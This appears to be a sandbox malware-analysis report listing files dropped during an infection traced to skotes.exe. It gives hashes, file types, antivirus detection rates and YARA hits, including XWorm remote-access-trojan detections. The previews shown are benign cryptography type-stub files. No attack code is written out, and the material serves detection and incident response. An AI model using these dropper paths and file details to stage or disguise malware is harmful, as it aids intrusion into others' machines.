                                                                                                                                            SSDEEP:49152:L1Dt9raflh10V8hT50WH3auKHab7SNudXjdTF:pDt9raT10VC5GOJF
                                                                                                                                            MD5:68D36FA633B4FB19D5C5B285C9A0B415
                                                                                                                                            SHA1:02A5E654832380CCEC23485DA0705DD2E748DA0C
                                                                                                                                            SHA-256:2670D23C86CF1D9B2CAEC5A61FF7D61E2D9FDB449531CAE509BB4F65D75C45C8
                                                                                                                                            SHA-512:5B250529C7092F7842260921789A12E4232B1CB4B80A188510EAC49BA0E96FEA64DCC7A588829FB009C926410126C4663BB831A62D003B96BC76FF5045785FCB
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):482304
                                                                                                                                            Entropy (8bit):3.1342365717789904
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:4FAvjMvA4v2Oh9R8DZqYplTTiX5Ak6kGyR8W5lHbRAnEmmOJOh4Zg:NjMvA4fh9qDZqYOXYyRR5lb2nEQj
                                                                                                                                            MD5:D22612D2899FC888514C3CA553B49F79
                                                                                                                                            SHA1:6DBA3A3B96225FE24229F1B39509A503547D1401
                                                                                                                                            SHA-256:B2ACD91FDCEF767FA027519E3BE0F61CE027C8BDF57027E2C161257DFA5D6543
                                                                                                                                            SHA-512:9DF54DF59FE341C0719C0D329DB4D2810DE385F133E210D6046DEB06F94BC3A3C5591A7E52906F91E93DAFB2ADC110021354FDA505B64A974274DC03E83ED4C9
                                                                                                                                            Malicious:true
                                                                                                                                            Yara Hits:
                                                                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exe, Author: Joe Security
                                                                                                                                            • Rule: rat_win_xworm_v2, Description: Finds XWorm v2 samples based on characteristic strings, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exe, Author: Sekoia.io
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                            Joe Sandbox View:
                                                                                                                                            • Filename: NzL6O1Q.exe, Detection: malicious, Browse
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1771008
                                                                                                                                            Entropy (8bit):6.829704744143836
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:CS3RWpdupsY0HhzA6AydDu9H73NvHgTxRnqY33u4citY1HtFPMRWpYp:3idupsYohzA6AydDu9leXu4ciGHi
                                                                                                                                            MD5:1C0FDE14F7A46816A2E8A747A90E1584
                                                                                                                                            SHA1:76EDA2D23786BE801521479B6C83D97C16B27879
                                                                                                                                            SHA-256:D2638065D9C0CF218EFA5E05DC67E282110E854DE56D4A124D3DF57068B2E3E3
                                                                                                                                            SHA-512:AE60B7D606BB2B8D1AF89CD828386AD33EC85FD75ADB7810EE988445880412E5CD71584327167E839B1F6C6DB5F876F9F88D4BAEB862ABFCE085FA43D70CEC3F
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 37%
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1863680
                                                                                                                                            Entropy (8bit):7.949536612027424
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:ldJxwCiS1hWdXbvAy9Ve45uoMrngyTQ2jcBxiu8RjkvXc:ld4u1hwAqe45argbX82vX
                                                                                                                                            MD5:89CF32E94C9A6312D70F99607678E53F
                                                                                                                                            SHA1:DF7D7BC10668EF9F08BECD125B53CDDC4161CD29
                                                                                                                                            SHA-256:7CAB621F2D3718A277BD18BB1A595214B3F59F6FB9CD767C41F5E42A5A54A3C9
                                                                                                                                            SHA-512:9A0AE8FC5763E58F31F6022AF90B23B276937AE0C1B740A3BEE7D72772EA74623AF128B73AECC117CD1C0F744559D5B51256B26EB004BAE81F54C75DEB6C0828
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4440576
                                                                                                                                            Entropy (8bit):7.987295833950863
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:98304:+CKTwgrDzzSsiXwi2oXGKicGBMqUo3vxCRf12bd:nKTTrDzGsiXwJM29BT/xCRf1q
                                                                                                                                            MD5:C9A3FA54A4AA25263EE9E81172DB3BDF
                                                                                                                                            SHA1:596E6B43C197AEEEA1DC5EDF330EF4B889980FFE
                                                                                                                                            SHA-256:7C3FB6A3953259BB51B2C5ED0CC5059A9DCA9D890E873FB2E72B0378ED242F97
                                                                                                                                            SHA-512:372BD612259369266EC4739116432C0FF5926695E03AD34193DCDF0C96BE54F37E018F5B72AB57D543186232235734D63ECB6CFCEB7EFFC56740C318F71A1060
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):64
                                                                                                                                            Entropy (8bit):1.1510207563435464
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                                                                                                            MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                                                                                                            SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                                                                                                            SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                                                                                                            SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:@...e................................................@..........
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):27136
                                                                                                                                            Entropy (8bit):5.886585917020445
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:IUkOZ0l/h1dhJIiBzqY0kj0BZK4BUbL0c5PJ7W7nRWr4Ih/VoxXL5ly2W+3W9usk:NbLGhKhjyNYsRnTBAtHzae6M
                                                                                                                                            MD5:86268AF17C4C5AFF970734EB5775A7F8
                                                                                                                                            SHA1:2C77E4720C8EB3AB8ACEF2E758B649D63FE16755
                                                                                                                                            SHA-256:6D8199A84B7256CF46B852E911221165C7FA044FBFC1642EF9ED24FFEE666470
                                                                                                                                            SHA-512:5443662D4A761FC77CBEE8883FF3677D7C1755DCA45D9F80440F211B1ECD19B695906B8A06027C980E5A5DC1B08010202E5653C63CC2658956D7D63F43BE65FF
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1863680
                                                                                                                                            Entropy (8bit):7.949536612027424
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:ldJxwCiS1hWdXbvAy9Ve45uoMrngyTQ2jcBxiu8RjkvXc:ld4u1hwAqe45argbX82vX
                                                                                                                                            MD5:89CF32E94C9A6312D70F99607678E53F
                                                                                                                                            SHA1:DF7D7BC10668EF9F08BECD125B53CDDC4161CD29
                                                                                                                                            SHA-256:7CAB621F2D3718A277BD18BB1A595214B3F59F6FB9CD767C41F5E42A5A54A3C9
                                                                                                                                            SHA-512:9A0AE8FC5763E58F31F6022AF90B23B276937AE0C1B740A3BEE7D72772EA74623AF128B73AECC117CD1C0F744559D5B51256B26EB004BAE81F54C75DEB6C0828
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1714462
                                                                                                                                            Entropy (8bit):7.946301893129129
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:L1Dt9raflh10V8hT50WH3auKHab7SNudXjdTF:pDt9raT10VC5GOJF
                                                                                                                                            MD5:68D36FA633B4FB19D5C5B285C9A0B415
                                                                                                                                            SHA1:02A5E654832380CCEC23485DA0705DD2E748DA0C
                                                                                                                                            SHA-256:2670D23C86CF1D9B2CAEC5A61FF7D61E2D9FDB449531CAE509BB4F65D75C45C8
                                                                                                                                            SHA-512:5B250529C7092F7842260921789A12E4232B1CB4B80A188510EAC49BA0E96FEA64DCC7A588829FB009C926410126C4663BB831A62D003B96BC76FF5045785FCB
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):482304
                                                                                                                                            Entropy (8bit):3.1342365717789904
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:4FAvjMvA4v2Oh9R8DZqYplTTiX5Ak6kGyR8W5lHbRAnEmmOJOh4Zg:NjMvA4fh9qDZqYOXYyRR5lb2nEQj
                                                                                                                                            MD5:D22612D2899FC888514C3CA553B49F79
                                                                                                                                            SHA1:6DBA3A3B96225FE24229F1B39509A503547D1401
                                                                                                                                            SHA-256:B2ACD91FDCEF767FA027519E3BE0F61CE027C8BDF57027E2C161257DFA5D6543
                                                                                                                                            SHA-512:9DF54DF59FE341C0719C0D329DB4D2810DE385F133E210D6046DEB06F94BC3A3C5591A7E52906F91E93DAFB2ADC110021354FDA505B64A974274DC03E83ED4C9
                                                                                                                                            Malicious:true
                                                                                                                                            Yara Hits:
                                                                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe, Author: Joe Security
                                                                                                                                            • Rule: rat_win_xworm_v2, Description: Finds XWorm v2 samples based on characteristic strings, Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe, Author: Sekoia.io
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):24997182
                                                                                                                                            Entropy (8bit):7.992307862787898
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:393216:hQvPJ/582VKol2VAkyoHf0O51u8MR5thr3woxkPnB/1isAlzKO4yFmE4RTdj0gNR:kPJmkpkAkhMKBorx3Lz/n4RTdIgEmSEr
                                                                                                                                            MD5:9D60674507EA97985C7E3B08D610F8D7
                                                                                                                                            SHA1:1FCCF49236815C14C5AE08ADB8D1B23846051B2D
                                                                                                                                            SHA-256:711CD08835ADD9FEECDD4AFCFB8DF8370FE98C22969FA2CB0CC010A8C8E25D12
                                                                                                                                            SHA-512:B841CD0C37171B666B8F03908B6643583D97625321F2017CAEBFB6C3F9B59ECB8F545586170D2467FE05C378E5411F1108CB3B4B53402661506FDD2F0F040DF6
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 13%
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4440576
                                                                                                                                            Entropy (8bit):7.987295833950863
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:98304:+CKTwgrDzzSsiXwi2oXGKicGBMqUo3vxCRf12bd:nKTTrDzGsiXwJM29BT/xCRf1q
                                                                                                                                            MD5:C9A3FA54A4AA25263EE9E81172DB3BDF
                                                                                                                                            SHA1:596E6B43C197AEEEA1DC5EDF330EF4B889980FFE
                                                                                                                                            SHA-256:7C3FB6A3953259BB51B2C5ED0CC5059A9DCA9D890E873FB2E72B0378ED242F97
                                                                                                                                            SHA-512:372BD612259369266EC4739116432C0FF5926695E03AD34193DCDF0C96BE54F37E018F5B72AB57D543186232235734D63ECB6CFCEB7EFFC56740C318F71A1060
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1967616
                                                                                                                                            Entropy (8bit):7.942586744122007
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:0Z7JUUPG9T4zOtKq2HydWyAjHWlP9O0C4drUzR4T+:0tPG9FXEyAEFtdrq4T+
                                                                                                                                            MD5:4F5013C5D4C13BCB3D9BB98AC601D056
                                                                                                                                            SHA1:8A4862EE54FAE9DF6AE6A8D2616B0D9D021B4FBD
                                                                                                                                            SHA-256:56DAFBBA12A48578DC834632CAA40DD7A96FA04FE04A7CAE87F60F960043C2D9
                                                                                                                                            SHA-512:CBFC65A34B1052E165677807F4A74AAEB7B14BF6E942CEAAF8B6CA2BF4F03DFD1878DEF3B31446E4910651971B3A3A4C0DE40120D2A57A0E67E1B232E9B3EA82
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1771008
                                                                                                                                            Entropy (8bit):6.829704744143836
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:CS3RWpdupsY0HhzA6AydDu9H73NvHgTxRnqY33u4citY1HtFPMRWpYp:3idupsYohzA6AydDu9leXu4ciGHi
                                                                                                                                            MD5:1C0FDE14F7A46816A2E8A747A90E1584
                                                                                                                                            SHA1:76EDA2D23786BE801521479B6C83D97C16B27879
                                                                                                                                            SHA-256:D2638065D9C0CF218EFA5E05DC67E282110E854DE56D4A124D3DF57068B2E3E3
                                                                                                                                            SHA-512:AE60B7D606BB2B8D1AF89CD828386AD33EC85FD75ADB7810EE988445880412E5CD71584327167E839B1F6C6DB5F876F9F88D4BAEB862ABFCE085FA43D70CEC3F
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 37%
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8694
                                                                                                                                            Entropy (8bit):5.536678334531042
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:oe65nY89EX+/NjsHXk/yiItPdZ9QjIsZFN7gggyvo:oT9vVhytPFQjIsZFNZo
                                                                                                                                            MD5:781B7F8E9F0310E2AEDF04E5E8B705FD
                                                                                                                                            SHA1:1B06139D45EB2C5AF2D29301F4539C4879A9B34F
                                                                                                                                            SHA-256:539699CEAF818DF1FE3935BAD62E88D01DE3F580BE1D53E3D3DD727270CA3726
                                                                                                                                            SHA-512:DCCB1302A77BCB88FB1D7E665D2A72129A17EA97F36F5F45CB80C6D79010F550C2302A4F77B8B9E01B87472E235251587417297EE2429AC9D4CFEC25C03FB3BC
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3775
                                                                                                                                            Entropy (8bit):4.806063133542859
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:5FYPjdtB5JjZL6mKokLSL0jcj9yYFtpZuObl9gbiYbwJbzk:5PZoUW0jcj9yYFtpZuObfgbiYbwJbzk
                                                                                                                                            MD5:B945169B742389524DF72625C079BB77
                                                                                                                                            SHA1:C9E77F8537E3B9888CBCF45E26774192ACB0C39A
                                                                                                                                            SHA-256:A0C8ED071D9E4B833FFD9BCA4658711806A4DA9D95492333EF39B61EF84FD1F6
                                                                                                                                            SHA-512:E1FAA4C936410781682007CE1C65C03D2CE947DCFB1A50D75184B075F5BEBC070A87FED4511086BBBF073EA831331BA8DFD3B87B520D5137AB80FB91D3AD4DA7
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Dict, Optional, Tuple, Union, overload..from typing_extensions import Literal....Buffer=bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_ccm import CcmMode..from Crypto.Cipher._mode_eax import EaxMode..from Crypto.Cipher._mode_gcm import GcmMode..from Crypto.Cipher._mode_siv import SivMode..from Crypto.Cipher._mode_ocb import OcbMode....MODE_ECB: Literal[1]..MODE_CBC: Literal[2]..MODE_CFB: Literal[3]..MODE_OFB: Literal[5]..MODE_CTR: Literal[6]..MODE_OPENPGP: Literal[7]..MODE_CCM: Literal[8]..MODE_EAX: Literal[9]..MODE_SIV: Literal[10]..MODE_GCM: Literal[11]..MODE_OCB: Literal[12]....# MODE_ECB..@overload..def new(key: Buffer,.. mode: Literal[1],.. use_aesni : bool = ...) ->
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1020
                                                                                                                                            Entropy (8bit):4.950943296452636
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RENAAI1+WJ+YzJ+YVJ+EJ+YpJ+ylJ+PvpB+yE2x/NEo0EDNqDNMN3zb1DoeRHYO:K+1+O+O+s+8+s+w+Hx9GIJqJejbFoeRZ
                                                                                                                                            MD5:E00CF491B8FC5ACAF9CEF612321636A0
                                                                                                                                            SHA1:AB112C6E5D09F9A330047422454765FC4D691F1F
                                                                                                                                            SHA-256:605DD941F8ED380F3CF8906B995FCF9CFD8D801668E85B8FC889D72EC00087CD
                                                                                                                                            SHA-512:5FE5E3E20E1911E73FAB3886072A47F6C0E554C9F0D1A3604FDB8577747143C220457FB1105D565589E59A6202EE893F2F5C82A63267AEFA061BB129BA3A23C3
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....ARC2Mode = int....MODE_ECB: ARC2Mode..MODE_CBC: ARC2Mode..MODE_CFB: ARC2Mode..MODE_OFB: ARC2Mode..MODE_CTR: ARC2Mode..MODE_OPENPGP: ARC2Mode..MODE_EAX: ARC2Mode....def new(key: Buffer,.. mode: ARC2Mode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .......block_size: int..key_s
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):438
                                                                                                                                            Entropy (8bit):4.892911336139007
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBdHgMJjWrMRyDWeXRyc1APyMFq6R5wnZ0R5AomWL7Ry/O:1REUAIWrQFeBFAfnRe+RGorVYO
                                                                                                                                            MD5:F00CD9D3130AA368D5F1F10B93E0A612
                                                                                                                                            SHA1:E9C27B3918320183E7366BD1D1294B48EAC93378
                                                                                                                                            SHA-256:28855BC2FF6531EFD40C42075EB5E506AD8A5F8D98B8041FB218725C7C484054
                                                                                                                                            SHA-512:228840E70CD9FAD2CB8EA202BD45931614A9E26C619ECDBC017E832B3588C85B0BBA97B762A804DB16BE3D19481B1CC17AB616FE66D46FD66DCB38B132D2994A
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Any, Union, Iterable....Buffer = bytes|bytearray|memoryview....class ARC4Cipher:.. block_size: int.. key_size: int.... def __init__(self, key: Buffer, *args: Any, **kwargs: Any) -> None: ..... def encrypt(self, plaintext: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer) -> bytes: .......def new(key: Buffer, drop : int = ...) -> ARC4Cipher: .......block_size: int..key_size: Iterable[int]..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1056
                                                                                                                                            Entropy (8bit):4.93319559592513
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RENAAI1+WJ+YzJ+YVJ+EJ+YpJ+ylJ+7vEStrF+olDNqDNMN3zb1DoeRHYO:K+1+O+O+s+8+s+w+DtrF+wJqJejbFoev
                                                                                                                                            MD5:ADC4E67BDA4767C9F270DD32CCECC085
                                                                                                                                            SHA1:69FE8AABD602E03066EE627CFD0185486383A618
                                                                                                                                            SHA-256:C108D97BABEE0989438F29A01B0B0B95AE54118434A49AE832FD0EB2310FB73F
                                                                                                                                            SHA-512:C613BA321D3F8D0C41BE9DE652A47839C2059F9BF53F1FAA9E5967193D1898EAFF394857D6EAB4E0AA24E2159733BC304AACE3A94DBF6CD2B200EBA8712477D2
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....BlowfishMode = int....MODE_ECB: BlowfishMode..MODE_CBC: BlowfishMode..MODE_CFB: BlowfishMode..MODE_OFB: BlowfishMode..MODE_CTR: BlowfishMode..MODE_OPENPGP: BlowfishMode..MODE_EAX: BlowfishMode....def new(key: Buffer,.. mode: BlowfishMode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgp
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1021
                                                                                                                                            Entropy (8bit):4.948780176242253
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RENAAI1+WJ+YzJ+YVJ+EJ+YpJ+ylJ+TivieL/tixsDOIosswDNqDNMN3zb1DoeZ:K+1+O+O+s+8+s+w+TQieL/tixsDOIYwr
                                                                                                                                            MD5:DF4E506EF652F92CD4F1C01C3E91C3E0
                                                                                                                                            SHA1:49625B957B302755062BFEF1FD00A1C88F378C79
                                                                                                                                            SHA-256:A017C351D0BF5AEFC610A60EE41B968BC5C1FA5E78B9FA593FE3C9C278CE9550
                                                                                                                                            SHA-512:9B85DFA5B47C60337AEE04D48AF64FE2B5F03152498DE4C340B0A4C170262D0C5BE8549787AA0093592E2308A41AE88A725E8C2D6B340E3B6EB8B2803C0328D2
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....CASTMode = int....MODE_ECB: CASTMode..MODE_CBC: CASTMode..MODE_CFB: CASTMode..MODE_OFB: CASTMode..MODE_CTR: CASTMode..MODE_OPENPGP: CASTMode..MODE_EAX: CASTMode....def new(key: Buffer,.. mode: CASTMode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .......block_size: int..key_s
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):798
                                                                                                                                            Entropy (8bit):4.852768717173627
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RE2AIM/sxQUADnRNne3yFnR3Fne3xodgxVYBy:3Me/4vesLehx+w
                                                                                                                                            MD5:7311A085F06CFB4AF892363A4CB21E0E
                                                                                                                                            SHA1:5DF2EEAE8BFD1978BE23CCDD2ECD712CFB79D6B1
                                                                                                                                            SHA-256:CE31A7182E4369DC8F65D929813CE67E7AFA67ECEED9821B124BBEAB13D9E668
                                                                                                                                            SHA-512:B6332CFB639FCF28701DF645276F21EA8535E6B401FDB6162E0F397B74FDBF47CECC10EE8B400278F268EBDAA1FF4C5A824BA408A03BE9A9CB9ADC167F61CA87
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, overload, Optional....Buffer = bytes|bytearray|memoryview....def _HChaCha20(key: Buffer, nonce: Buffer) -> bytearray: .......class ChaCha20Cipher:.. block_size: int.. nonce: bytes.... def __init__(self, key: Buffer, nonce: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... def seek(self, position: int) -> None: .......def new(key: Buffer, nonce: Optional[Buffer] = ...) -> ChaCha20Cipher: .......block_size: int..key_size: int..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
